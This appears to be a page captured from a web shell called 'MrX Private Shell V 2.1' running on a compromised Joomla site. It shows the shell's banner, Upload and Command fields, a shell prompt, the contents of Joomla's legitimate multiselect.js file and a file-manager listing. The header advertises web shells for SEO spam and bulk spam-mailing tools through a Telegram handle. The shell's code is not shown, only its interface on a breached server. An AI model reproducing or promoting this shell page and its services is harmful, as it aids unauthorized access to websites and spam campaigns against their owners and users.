__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/**
 * @copyright   (C) 2018 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

/**
 * JavaScript behavior to allow shift select in administrator grids
 */
(Joomla => {

  class JMultiSelect {
    constructor(formElement) {
      this.tableEl = document.querySelector(formElement);
      if (this.tableEl) {
        this.boxes = [].slice.call(this.tableEl.querySelectorAll('td input[type=checkbox]'));
        this.rows = [].slice.call(document.querySelectorAll('tr[class^="row"]'));
        this.checkallToggle = document.querySelector('[name="checkall-toggle"]');
        this.onCheckallToggleClick = this.onCheckallToggleClick.bind(this);
        this.onRowClick = this.onRowClick.bind(this);
        if (this.checkallToggle) {
          this.checkallToggle.addEventListener('click', this.onCheckallToggleClick);
        }
        if (this.rows.length) {
          this.rows.forEach(row => {
            row.addEventListener('click', this.onRowClick);
          });
        }
      }
    }

    // Changes the background-color on every cell inside a <tr>
    // eslint-disable-next-line class-methods-use-this
    changeBg(row, isChecked) {
      // Check if it should add or remove the background colour
      if (isChecked) {
        [].slice.call(row.querySelectorAll('td, th')).forEach(elementToMark => {
          elementToMark.classList.add('row-selected');
        });
      } else {
        [].slice.call(row.querySelectorAll('td, th')).forEach(elementToMark => {
          elementToMark.classList.remove('row-selected');
        });
      }
    }
    onCheckallToggleClick({
      target
    }) {
      const isChecked = target.checked;
      this.rows.forEach(row => {
        this.changeBg(row, isChecked);
      });
    }
    onRowClick({
      target,
      shiftKey
    }) {
      // Do not interfere with links or buttons
      if (target.tagName && (target.tagName.toLowerCase() === 'a' || target.tagName.toLowerCase() === 'button')) {
        return;
      }
      if (!this.boxes.length) {
        return;
      }
      const closestRow = target.closest('tr');
      const currentRowNum = this.rows.indexOf(closestRow);
      const currentCheckBox = closestRow.querySelector('td input[type=checkbox]');
      if (currentCheckBox) {
        let isChecked = currentCheckBox.checked;
        if (!(target.id === currentCheckBox.id)) {
          // We will prevent selecting text to prevent artifacts
          if (shiftKey) {
            document.body.style['-webkit-user-select'] = 'none';
            document.body.style['-moz-user-select'] = 'none';
            document.body.style['-ms-user-select'] = 'none';
            document.body.style['user-select'] = 'none';
          }
          currentCheckBox.checked = !currentCheckBox.checked;
          isChecked = currentCheckBox.checked;
          Joomla.isChecked(isChecked, this.tableEl.id);
        }
        this.changeBg(this.rows[currentRowNum], isChecked);

        // Restore normality
        if (shiftKey) {
          document.body.style['-webkit-user-select'] = 'none';
          document.body.style['-moz-user-select'] = 'none';
          document.body.style['-ms-user-select'] = 'none';
          document.body.style['user-select'] = 'none';
        }
      }
    }
  }
  const onBoot = () => {
    let formId = '#adminForm';
    if (Joomla && Joomla.getOptions('js-multiselect', {}).formName) {
      formId = `#${Joomla.getOptions('js-multiselect', {}).formName}`;
    }
    // eslint-disable-next-line no-new
    new JMultiSelect(formId);
  };
  document.addEventListener('DOMContentLoaded', onBoot);
})(Joomla);

Filemanager

Name Type Size Permission Actions
fields Folder 0775
core-es5.js File 27.01 KB 0664
core-es5.min.js File 7.12 KB 0664
core-es5.min.js.gz File 2.93 KB 0664
core.js File 25.53 KB 0664
core.min.js File 7.34 KB 0664
core.min.js.gz File 2.99 KB 0664
draggable-es5.js File 6.14 KB 0664
draggable-es5.min.js File 2.09 KB 0664
draggable-es5.min.js.gz File 929 B 0664
draggable.js File 5.66 KB 0664
draggable.min.js File 2.39 KB 0664
draggable.min.js.gz File 969 B 0664
highlight-es5.js File 70.08 KB 0664
highlight-es5.min.js File 15.97 KB 0664
highlight-es5.min.js.gz File 5.61 KB 0664
highlight.js File 61.34 KB 0664
highlight.min.js File 14.13 KB 0664
highlight.min.js.gz File 5.23 KB 0664
inlinehelp-es5.js File 2.36 KB 0664
inlinehelp-es5.min.js File 714 B 0664
inlinehelp-es5.min.js.gz File 382 B 0664
inlinehelp.js File 2.12 KB 0664
inlinehelp.min.js File 647 B 0664
inlinehelp.min.js.gz File 359 B 0664
joomla-core-loader-es5.js File 9.16 KB 0664
joomla-core-loader-es5.min.js File 5.96 KB 0664
joomla-core-loader-es5.min.js.gz File 2.03 KB 0664
joomla-core-loader.js File 4.54 KB 0664
joomla-core-loader.min.js File 3.86 KB 0664
joomla-core-loader.min.js.gz File 1.17 KB 0664
joomla-hidden-mail-es5.js File 5.44 KB 0664
joomla-hidden-mail-es5.min.js File 2.75 KB 0664
joomla-hidden-mail-es5.min.js.gz File 1.12 KB 0664
joomla-hidden-mail.js File 2.26 KB 0664
joomla-hidden-mail.min.js File 1.38 KB 0664
joomla-hidden-mail.min.js.gz File 613 B 0664
joomla-toolbar-button-es5.js File 7.96 KB 0664
joomla-toolbar-button-es5.min.js File 3.87 KB 0664
joomla-toolbar-button-es5.min.js.gz File 1.49 KB 0664
joomla-toolbar-button.js File 3.08 KB 0664
joomla-toolbar-button.min.js File 1.69 KB 0664
joomla-toolbar-button.min.js.gz File 662 B 0664
keepalive-es5.js File 1.12 KB 0664
keepalive-es5.min.js File 430 B 0664
keepalive-es5.min.js.gz File 308 B 0664
keepalive.js File 1 KB 0664
keepalive.min.js File 578 B 0664
keepalive.min.js.gz File 315 B 0664
list-view-es5.js File 3.15 KB 0664
list-view-es5.min.js File 1.56 KB 0664
list-view-es5.min.js.gz File 534 B 0664
list-view.js File 2.75 KB 0664
list-view.min.js File 1.6 KB 0664
list-view.min.js.gz File 553 B 0664
messages-es5.js File 17.44 KB 0664
messages-es5.min.js File 8.31 KB 0664
messages-es5.min.js.gz File 2.82 KB 0664
messages.js File 10.28 KB 0664
messages.min.js File 5.29 KB 0664
messages.min.js.gz File 1.66 KB 0664
multiselect-es5.js File 4.17 KB 0664
multiselect-es5.min.js File 1.94 KB 0664
multiselect-es5.min.js.gz File 686 B 0664
multiselect.js File 3.6 KB 0664
multiselect.min.js File 1.8 KB 0664
multiselect.min.js.gz File 645 B 0664
searchtools-es5.js File 20.9 KB 0664
searchtools-es5.min.js File 10.86 KB 0664
searchtools-es5.min.js.gz File 2.63 KB 0664
searchtools.js File 18.8 KB 0664
searchtools.min.js File 10.52 KB 0664
searchtools.min.js.gz File 2.58 KB 0664
showon-es5.js File 10.55 KB 0664
showon-es5.min.js File 3.47 KB 0664
showon-es5.min.js.gz File 1.24 KB 0664
showon.js File 9.57 KB 0664
showon.min.js File 3.35 KB 0664
showon.min.js.gz File 1.23 KB 0664
table-columns-es5.js File 6.78 KB 0664
table-columns-es5.min.js File 3.57 KB 0664
table-columns-es5.min.js.gz File 1.31 KB 0664
table-columns.js File 6.01 KB 0664
table-columns.min.js File 3.43 KB 0664
table-columns.min.js.gz File 1.25 KB 0664
Filemanager